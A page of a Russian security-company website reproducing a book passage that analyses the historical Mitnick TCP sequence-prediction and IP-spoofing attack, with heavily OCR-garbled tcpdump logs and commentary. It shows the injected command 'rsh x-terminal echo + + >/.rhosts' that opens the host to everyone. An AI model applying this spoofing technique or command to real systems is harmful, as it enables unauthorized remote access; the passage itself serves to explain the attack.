Системы безопасности

8(495)909-90-01

8(964)644-46-00

pro@sio.su

Главная

	Главная
	Системы видеонаблюдения
	Охранная сигнализация
	Пожарная сигнализация
	Система пожаротушения
	Система контроля удаленного доступа
	Оповещение и эвакуация
	Контроль периметра
	Система домофонии
	Парковочные системы
	Проектирование слаботочных сетей
	Аварийный контроль

Раздел: Документация

0 ... 124 125 126 127 128 129 130 ... 169

S 1382727001:1382727001(0) win 4096 14:18:31. 795260 X-terminal. shell > apollo. it.. luc. edu. 989: s 2023232000:2023232000(0) ack 1382727002 win 4096 14:18:31. 873056 apollo. it. luc. edu. 989 > x-terminal. shell: R 1382727002:1382727002(0) win 0 14:18:32. 164597 apollo. it. luc. edu. 988 > x-terminal. shell: S 1382727002:1382727002(0) win 4096 14:18:32. 335373 x-terminal. shell > apollo. it. luc. edu. 988: S

2023360000:2023360000(0) ack 1382727003 win 4096

14:18:32. 413041 apollo. it. luc. edu. 988 > x-terminal. shell: R 1382727003:1382727003(0) win 0 14:18:32.

674779 apollo. it. luc. edu. 987 > x-terminal. shell: S 1382727003:1382727003(0) win 4096 14:18:32. 845373 x-terminal. shell > apollo. it. luc. edu. 987: S

2023488000:2023488000(0) ack 1382727004 win 4096 14:18:32. 922158 apollo. it. luc. edu. 987 > x-terminal. shell: R 1382727004:1382727004 (0) winO 14:18:33. 184839 apollo. it. luc. edu. 986 > x-terminal. shell:

S 1382727004:1382727004(0) win 4096 14:18:33. 355505

x-terminal. shell > apollo. it. luc. edu. 986: S 2023616000:2023616000(0), ack 1382727005 win 4096

14:18:33. 435221 apollo. it. luc. edu. 986 > x-termi-

nal. shell: R 1382727005:1382727005 (0) win 0 14:18:33.

695170 apollo. it. luc. edu. 985 > x-terminal. shell: S 1382727005:1382727005(0) win 4096 14:18:33. 985966

x-terminal. shell > apollo. it. luc. edu. 985: S

2023744000:2023744000(0) ack 1382727006 win 4096 14:18:34. 062407 apollo. it. luc. edu. 985 > x-termi-

nal. shell: R 1382727006:1382727006(0) win 0 14:18:34. 204953 apollo. it. luc. edu. 984 > x-teriininal. shell:

S 1382727006:1382727006(0) win 4096 14:18:34. 375641

x-terminal. shell > apollo. it. luc. edu. 984: S 2023872000:2023872000(0) ack 1382727007 win 4096

14:18:34. 452830 apollo. it. luc. edu. 984 > x-termi-

nal. shell: R 1382727007:1382727007 (0) winO 14:18:34.

714996 apollo. it. luc. edu. 983 > x-terminal. shell:

S 1382727007:1382727007(0) win 4096 14:18:34. 885071 x-terminal. shell > apollo. it. luc. edu. 983: S 2024000000:2024000000(0) ack 1382727008 win 4096

14:18:34. 962030 apollo. it. luc. edu. 983 > x-termi-

nal. shell: R 1382727008:1382727008 (0) win 0 14:18:35.

225869 apollo. it. luc. edu. 982 > x-terminal. shell: S 1382727008:1382727008(0) win 4096 14:18:35. 395723 x-terminal. shell > apollo. it. luc. edu. 982: S 2024128000:2024128000(0) ack 1382727009 win 4096

383

14:18:35. 472150 apollo. it.982 > x-termi-

nal. shell: R 1382727009:1382727009(0) win 0 14:18:35. 735077 apollo. it. luc. edu. 981 > x-terminal. shell: S 1382727009:1382727009(0) win 4096 14:18:35. 905684 x-terminal. shell > apollo. it. luc. edu. 981: S 2024256000:2024256000(0) ack 1382727010 win 4096

14:18:35. 983078 apollo. it. luc. edu. 981 > x-termi-

nal. shell: R 1382727010:1382727010(0) win 0

Надо заметить, что каждый SYN-ACK, посланный с x-terminal, имел очередной номер на 128,000 больше предыдущего. Теперь мы видим определенный SYN (запрос на соединение), идущий от server, login к x-terminal. shell. Было установлено атакующим, что x-terminal «верит» запросам с сервера, поэтому x-terminal будет принимать и обрабатывать пакеты, идущие с сервера (или кого-то, управляющим сервером). X-terminal отвечает server-пакетом SYN-ACK, который должен быть обработан для того, чтобы соединение было открыто. Так как сам сервер игнорирует пакеты, идущие на server, login, этот ACK остается необработанным. В нормальном состоянии пакетный номер от SYN-ACK требуется для нормальной генерации правильного пакета АСК. В данном случае атакующий является в состоянии предугадать пакет-ный номер, находящийся и составляющий SYN-ACK, базируясь на полученной технологии и алгоритме TCP генератора пакетных чисел x-terminal, и это дает возможность обработать SYN-ACK без транслирования процесса:

14:18:36. 245045 server, login > x-terminal. shell: S 1382727010:1382727010(0) win 4096 14:18:36. 755522 server, login > x-terminal. shell:, ack 2024384001 win 4096

Машина, с которой происходит атака адреса, теперь имеет одностороннее соединение с x-terminal. shell, которое выглядит как соединение с server, login. Эта система может управлять соединением, может направлять, получать и обрабатывать данные, идущие от x-ter-minal. shell. С системы идет запрос:

14:18:37. 265404 server, login > x-terminal. shell: P

0:2(2) ack 1 win 4096 14:18:37. 775872 server, login

> x-terminal. shell: P 2:7(5) ack 1 win 4096 14:18:38.

287404 server, login > x-terminal. shell: P 7:32(25)

384

ack win 4096

который преобразуется:

14:18:37 server* rsh x-terminal «echo + + »/. rhosts»

Общее время, которое прошло с момента попадания первого перехваченного пакета, составляло меньше 16 секунд. После чего система произвела отключение:

14:18:41. 347003 server, login > x-termir.al. shell:, ack 2 win 4096 14:18:42. 255978 server, login > x-terminal. shell:, ack 3 win 4096 14:18:43. 165874 server, login > x-terminal. shell: F 32:32(0) ack 3 win 4096 14:18:52. 179922 server. login > x-terminal. shell: R 1382727043:1382727043(0) win 4096 14:18:52. 236452 server. login > x-terminal. shell: R 1382727044:1382727044(0) win 4096

Далее появились RST пакеты для снятия «полуоткрытых» соединений и освобождения очереди соединений server, login:

14:18:52. 298431 130. 92. 6. 600 >login:

R 1382726960:1382726960(0) win 4096 14:18:52. 363877

130. 92. 6. 97. 601 > server. login: R

1382726961:1382726961(0) win 4096 14:18:52. 416916 130. 92. 6. 97. 602 > server. login: R 1382726962:1382726962(0) win 4096 14:18:52. 476873

130. 92. 6. 97. 603 > server. login: R 1382726963:1382726963(0) win 4096 14:18:52. 536573 130. 92. 6. 97. 604 > server. login: R

1382726964:1382726964(0) win 4096 14:18:52. 600899 130. 92. 6. 97. 605 > server. login: R 1382726965:1382726965(0) win 4096 14:18:52. 660231

130. 92. 6. 97. , 606 > server. login: R 1382726966:1382726966(0) win 4096 14:18:52. 717495

130. 92. 6. 97. 607 > server. login: R 1382726967:1382726967(0) win 4096 14:18:52. 776502 130. 92. 6. 97. 608 > server. login: R

1382726968:1382726968(0) win 4096 14:18:52. 836536

130. 92. 6. 97. 609 > server. login: R 1382726969:1382726969(0) win 4096 14:18:52. 937317

130. 92. 6. 97. 610 > server. login: R 1382726970:1382726970(0) win 4096 14:18:52. 996777

0 ... 124 125 126 127 128 129 130 ... 169